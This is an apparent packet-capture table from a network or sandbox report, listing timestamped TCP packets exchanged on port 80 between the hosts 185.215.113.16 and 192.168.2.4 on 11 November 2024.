                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937025070 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937025070 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937037945 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937042952 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937050104 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937062025 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937067032 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937073946 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937079906 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937098026 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937113047 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937501907 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937522888 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937536001 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937546968 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937555075 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937560081 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937568903 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937572002 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937582970 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937587976 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937597036 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937603951 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937608957 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937621117 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937624931 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937637091 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937645912 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937649012 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937657118 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937660933 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937681913 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937693119 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937695980 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937707901 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937717915 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937728882 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937743902 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937743902 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937747955 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937762022 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937768936 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937772989 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937786102 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937797070 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937807083 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937812090 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937812090 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937815905 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937824965 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937834024 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937834978 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937848091 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937859058 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937865973 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937870026 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937881947 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937884092 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937895060 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937906981 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937915087 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937915087 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937917948 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937932014 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937935114 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937943935 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937954903 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937962055 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937964916 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937971115 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937983990 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937994957 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.937999010 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938008070 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938009024 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938019991 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938026905 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938033104 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938040018 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938046932 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938056946 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938060999 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938077927 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938086987 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938416004 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938430071 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938438892 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938450098 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938461065 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938463926 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938472986 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938476086 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938483953 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938498974 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938502073 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938504934 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938513994 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938524961 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938539982 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938558102 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938564062 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938575983 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938585043 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938596010 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938606977 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938611031 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938617945 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938618898 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938632011 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938643932 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938646078 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938651085 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938656092 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938668013 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938668013 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938680887 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938683987 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938693047 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938709021 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938709974 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938720942 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938731909 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938735962 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938744068 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938752890 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938755989 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938767910 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938767910 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938781977 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938787937 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938796043 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938807011 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938813925 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938818932 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938822985 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938829899 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938841105 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938844919 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938852072 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938852072 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938863993 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938874960 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938875914 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938889027 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938891888 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938900948 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938910007 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938913107 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938924074 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938925982 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938939095 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938949108 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938950062 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938965082 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938980103 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.938990116 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939413071 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939434052 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939445019 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939455986 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939455986 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939469099 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939471960 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939481020 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939491987 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939496040 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939503908 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939508915 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939515114 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939522028 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939538002 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939557076 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939559937 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939573050 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939583063 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939594030 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939603090 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939604998 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939616919 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939620972 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939627886 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939636946 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939659119 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939666033 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939685106 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939697027 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939707994 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939718962 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939724922 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939729929 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939737082 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939743042 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939752102 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939754963 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939766884 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939778090 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939778090 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939790964 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939795971 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939802885 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939815044 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939819098 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939827919 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939831972 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939841986 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939845085 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939856052 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939857960 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939870119 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939881086 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939883947 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939891100 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939893007 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939907074 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939917088 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939919949 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939932108 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939932108 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939949989 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939963102 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939963102 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939965010 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939970970 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939977884 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939990044 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.939992905 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940004110 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940011024 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940016031 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940028906 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940032005 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940042019 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940043926 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940053940 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940063953 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940066099 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940078974 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940080881 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940090895 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940102100 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940105915 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940113068 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940116882 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940136909 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940146923 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940496922 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940511942 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940529108 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940540075 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940538883 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940551996 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940558910 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940563917 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940568924 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940574884 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940587044 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940593958 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.940601110 CET8049762185.215.113.16192.168.2.4
